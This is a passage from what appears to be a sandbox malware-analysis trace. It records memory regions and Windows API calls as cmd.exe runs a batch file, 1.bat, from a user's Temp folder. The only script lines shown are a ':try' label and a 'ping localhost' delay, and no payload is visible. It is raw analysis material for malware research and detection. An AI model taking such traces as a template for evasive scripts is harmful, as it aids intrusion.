"\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1170 start_va = 0x77790000 end_va = 0x777effff entry_point = 0x77790000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1171 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1172 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1173 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1174 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1175 start_va = 0xa10000 end_va = 0xb90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 1176 start_va = 0xba0000 end_va = 0x1f9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 1177 start_va = 0x1fa0000 end_va = 0x22e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fa0000" filename = "" Region: id = 1178 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1958 start_va = 0x22f0000 end_va = 0x25befff entry_point = 0x22f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 61 os_tid = 0x780 [0160.661] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ff8dc | out: lpSystemTimeAsFileTime=0x3ff8dc*(dwLowDateTime=0x62002070, dwHighDateTime=0x1d4406f)) [0160.661] GetCurrentProcessId () returned 0xcc [0160.661] GetCurrentThreadId () returned 0x780 [0160.661] GetTickCount () returned 0x3078e [0160.661] QueryPerformanceCounter (in: lpPerformanceCount=0x3ff8d4 | out: lpPerformanceCount=0x3ff8d4*=27887633478) returned 1 [0160.662] GetModuleHandleA (lpModuleName=0x0) returned 0x4ac10000 [0160.662] __set_app_type (_Type=0x1) [0160.662] __p__fmode () returned 0x75c631f4 [0160.662] __p__commode () returned 0x75c631fc [0160.662] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac321a6) returned 0x0 [0160.662] __getmainargs (in: _Argc=0x4ac34238, _Argv=0x4ac34240, _Env=0x4ac3423c, _DoWildCard=0, _StartInfo=0x4ac34140 | out: _Argc=0x4ac34238, _Argv=0x4ac34240, _Env=0x4ac3423c) returned 0 [0160.662] GetCurrentThreadId () returned 0x780 [0160.662] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x780) returned 0x60 [0160.662] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75c90000 [0160.662] GetProcAddress (hModule=0x75c90000, lpProcName="SetThreadUILanguage") returned 0x75cba84f [0160.662] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.663] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0160.663] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ff86c | out: phkResult=0x3ff86c*=0x0) returned 0x2 [0160.663] VirtualQuery (in: lpAddress=0x3ff8a3, lpBuffer=0x3ff83c, dwLength=0x1c | out: lpBuffer=0x3ff83c*(BaseAddress=0x3ff000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.663] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x3ff83c, dwLength=0x1c | out: lpBuffer=0x3ff83c*(BaseAddress=0x300000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0160.663] VirtualQuery (in: lpAddress=0x301000, lpBuffer=0x3ff83c, dwLength=0x1c | out: lpBuffer=0x3ff83c*(BaseAddress=0x301000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0160.663] VirtualQuery (in: lpAddress=0x303000, lpBuffer=0x3ff83c, dwLength=0x1c | out: lpBuffer=0x3ff83c*(BaseAddress=0x303000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.663] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x3ff83c, dwLength=0x1c | out: lpBuffer=0x3ff83c*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x130000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0160.663] GetConsoleOutputCP () returned 0x1b5 [0160.663] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0160.663] SetConsoleCtrlHandler (HandlerRoutine=0x4ac2e72a, Add=1) returned 1 [0160.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.663] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0160.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.663] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac341ac | out: lpMode=0x4ac341ac) returned 1 [0160.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.663] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0160.664] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.664] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac341b0 | out: lpMode=0x4ac341b0) returned 1 [0160.664] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.664] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0160.664] GetEnvironmentStringsW () returned 0x7921d8* [0160.664] FreeEnvironmentStringsW (penv=0x7921d8) returned 1 [0160.664] GetEnvironmentStringsW () returned 0x7921d8* [0160.664] FreeEnvironmentStringsW (penv=0x7921d8) returned 1 [0160.664] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fe7dc | out: phkResult=0x3fe7dc*=0x68) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x0, lpData=0x3fe7e8*=0x0, lpcbData=0x3fe7e0*=0x1000) returned 0x2 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x1, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x0, lpData=0x3fe7e8*=0x1, lpcbData=0x3fe7e0*=0x1000) returned 0x2 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x0, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x40, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x40, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x0, lpData=0x3fe7e8*=0x40, lpcbData=0x3fe7e0*=0x1000) returned 0x2 [0160.665] RegCloseKey (hKey=0x68) returned 0x0 [0160.665] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fe7dc | out: phkResult=0x3fe7dc*=0x68) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x0, lpData=0x3fe7e8*=0x40, lpcbData=0x3fe7e0*=0x1000) returned 0x2 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x1, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x0, lpData=0x3fe7e8*=0x1, lpcbData=0x3fe7e0*=0x1000) returned 0x2 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x0, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x9, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x9, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x0, lpData=0x3fe7e8*=0x9, lpcbData=0x3fe7e0*=0x1000) returned 0x2 [0160.665] RegCloseKey (hKey=0x68) returned 0x0 [0160.665] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8801d7 [0160.665] srand (_Seed=0x5b8801d7) [0160.665] GetCommandLineW () returned="cmd /c C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.665] GetCommandLineW () returned="cmd /c C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.665] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac35260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.666] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x794508, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0160.666] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0160.666] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0160.666] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0160.666] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.666] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0160.666] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0160.666] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0160.666] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0160.666] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0160.666] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0160.666] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0160.666] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0160.666] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0160.666] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ff5a8 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.666] GetFullPathNameW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x3ff5a8, lpFilePart=0x3ff5a4 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFilePart=0x3ff5a4*="Temp") returned 0x24 [0160.666] GetFileAttributesW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 0x2010 [0160.666] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ff324 | out: lpFindFileData=0x3ff324) returned 0x792058 [0160.666] FindClose (in: hFindFile=0x792058 | out: hFindFile=0x792058) returned 1 [0160.666] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1", lpFindFileData=0x3ff324 | out: lpFindFileData=0x3ff324) returned 0x792058 [0160.666] FindClose (in: hFindFile=0x792058 | out: hFindFile=0x792058) returned 1 [0160.666] _wcsnicmp (_String1="ADU0VK~1", _String2="ADU0VK~1", _MaxCount=0x8) returned 0 [0160.667] _wcsicmp (_String1="aDU0VK IWA5kLS", _String2="ADU0VK~1") returned -94 [0160.667] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData", lpFindFileData=0x3ff324 | out: lpFindFileData=0x3ff324) returned 0x792058 [0160.667] FindClose (in: hFindFile=0x792058 | out: hFindFile=0x792058) returned 1 [0160.667] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local", lpFindFileData=0x3ff324 | out: lpFindFileData=0x3ff324) returned 0x792058 [0160.667] FindClose (in: hFindFile=0x792058 | out: hFindFile=0x792058) returned 1 [0160.667] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFindFileData=0x3ff324 | out: lpFindFileData=0x3ff324) returned 0x792058 [0160.667] FindClose (in: hFindFile=0x792058 | out: hFindFile=0x792058) returned 1 [0160.667] GetFileAttributesW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 0x2010 [0160.667] SetCurrentDirectoryW (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 1 [0160.667] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 1 [0160.667] GetEnvironmentStringsW () returned 0x7921d8* [0160.667] FreeEnvironmentStringsW (penv=0x7921d8) returned 1 [0160.667] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac35260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.668] GetConsoleOutputCP () returned 0x1b5 [0160.668] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0160.668] GetUserDefaultLCID () returned 0x409 [0160.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac34950, cchData=8 | out: lpLCData=":") returned 2 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ff6e8, cchData=128 | out: lpLCData="0") returned 2 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ff6e8, cchData=128 | out: lpLCData="0") returned 2 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ff6e8, cchData=128 | out: lpLCData="1") returned 2 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac34940, cchData=8 | out: lpLCData="/") returned 2 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac34d80, cchData=32 | out: lpLCData="Mon") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac34d40, cchData=32 | out: lpLCData="Tue") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac34d00, cchData=32 | out: lpLCData="Wed") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac34cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac34c80, cchData=32 | out: lpLCData="Fri") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac34c40, cchData=32 | out: lpLCData="Sat") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac34c00, cchData=32 | out: lpLCData="Sun") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac34930, cchData=8 | out: lpLCData=".") returned 2 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac34920, cchData=8 | out: lpLCData=",") returned 2 [0160.669] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0160.670] GetConsoleTitleW (in: lpConsoleTitle=0x780860, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75c90000 [0160.670] GetProcAddress (hModule=0x75c90000, lpProcName="CopyFileExW") returned 0x75cc3b92 [0160.670] GetProcAddress (hModule=0x75c90000, lpProcName="IsDebuggerPresent") returned 0x75ca4a5d [0160.670] GetProcAddress (hModule=0x75c90000, lpProcName="SetConsoleInputExeNameW") returned 0x75cba79d [0160.672] _wcsicmp (_String1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", _String2=")") returned 58 [0160.672] _wcsicmp (_String1="FOR", _String2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 3 [0160.672] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 3 [0160.672] _wcsicmp (_String1="IF", _String2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 6 [0160.672] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 6 [0160.672] _wcsicmp (_String1="REM", _String2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 15 [0160.672] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 15 [0160.673] GetConsoleTitleW (in: lpConsoleTitle=0x3ff3e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.674] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3ff19c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x3ff194, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3ff194*=0xfcdf19fa, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0160.675] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0160.675] SetErrorMode (uMode=0x0) returned 0x8001 [0160.676] SetErrorMode (uMode=0x1) returned 0x0 [0160.676] GetFullPathNameW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x780d68, lpFilePart=0x3fef00 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFilePart=0x3fef00*="Temp") returned 0x24 [0160.676] SetErrorMode (uMode=0x8001) returned 0x1 [0160.676] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\.") returned 1 [0160.676] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0160.679] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.679] FindFirstFileExW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", fInfoLevelId=0x1, lpFindFileData=0x3fec9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fec9c) returned 0x780f08 [0160.679] FindClose (in: hFindFile=0x780f08 | out: hFindFile=0x780f08) returned 1 [0160.679] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0160.679] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0160.679] GetConsoleTitleW (in: lpConsoleTitle=0x3ff174, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.680] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76650000 [0160.680] GetProcAddress (hModule=0x76650000, lpProcName="SaferIdentifyLevel") returned 0x76672102 [0160.706] IdentifyCodeAuthzLevelW () returned 0x1 [0160.715] GetProcAddress (hModule=0x76650000, lpProcName="SaferComputeTokenFromLevel") returned 0x76673352 [0160.715] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0160.715] GetProcAddress (hModule=0x76650000, lpProcName="SaferCloseLevel") returned 0x76673825 [0160.715] CloseCodeAuthzLevel () returned 0x1 [0160.715] SetErrorMode (uMode=0x0) returned 0x8001 [0160.715] SetErrorMode (uMode=0x1) returned 0x0 [0160.715] GetFullPathNameW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", nBufferLength=0x104, lpBuffer=0x780ae8, lpFilePart=0x3ff060 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", lpFilePart=0x3ff060*="1.bat") returned 0x2a [0160.715] SetErrorMode (uMode=0x8001) returned 0x1 [0160.717] CmdBatNotification () returned 0x780b3a [0160.717] CreateFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3ff0a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0160.717] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0160.717] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.717] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.718] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.718] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.718] ReadFile (in: hFile=0x78, lpBuffer=0x4ac36640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3ff088, lpOverlapped=0x0 | out: lpBuffer=0x4ac36640*, lpNumberOfBytesRead=0x3ff088*=0xc6, lpOverlapped=0x0) returned 1 [0160.719] SetFilePointer (in: hFile=0x78, lDistanceToMove=6, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6 [0160.719] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ac36640, cbMultiByte=6, lpWideCharStr=0x4ac3c640, cchWideChar=8191 | out: lpWideCharStr=":try\r\n") returned 6 [0160.719] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.719] GetFileType (hFile=0x78) returned 0x1 [0160.719] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.719] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6 [0160.720] _tell (_FileHandle=3) returned 6 [0160.720] _close (_FileHandle=3) returned 0 [0160.720] CreateFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3ff0a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0160.720] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0160.720] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.720] SetFilePointer (in: hFile=0x78, lDistanceToMove=6, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6 [0160.720] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.720] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6 [0160.720] ReadFile (in: hFile=0x78, lpBuffer=0x4ac36640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3ff088, lpOverlapped=0x0 | out: lpBuffer=0x4ac36640*, lpNumberOfBytesRead=0x3ff088*=0xc0, lpOverlapped=0x0) returned 1 [0160.720] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0160.720] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ac36640, cbMultiByte=26, lpWideCharStr=0x4ac3c640, cchWideChar=8191 | out: lpWideCharStr="ping localhost -n 2 >NUL\r\n") returned 26 [0160.721] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.721] GetFileType (hFile=0x78) returned 0x1 [0160.721] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.721] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0160.721] _wcsicmp (_String1="ping", _String2=")") returned 71 [0160.722] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0160.722] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0160.722] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0160.722] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0160.722] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0160.722] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0160.723] _tell (_FileHandle=3) returned 32 [0160.723] _close (_FileHandle=3) returned 0 [0160.724] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3fee5c | out: _Buffer="\r\n") returned 2 [0160.724] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.724] GetFileType (hFile=0x7) returned 0x2 [0160.724] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.724] GetConsoleMode (in: 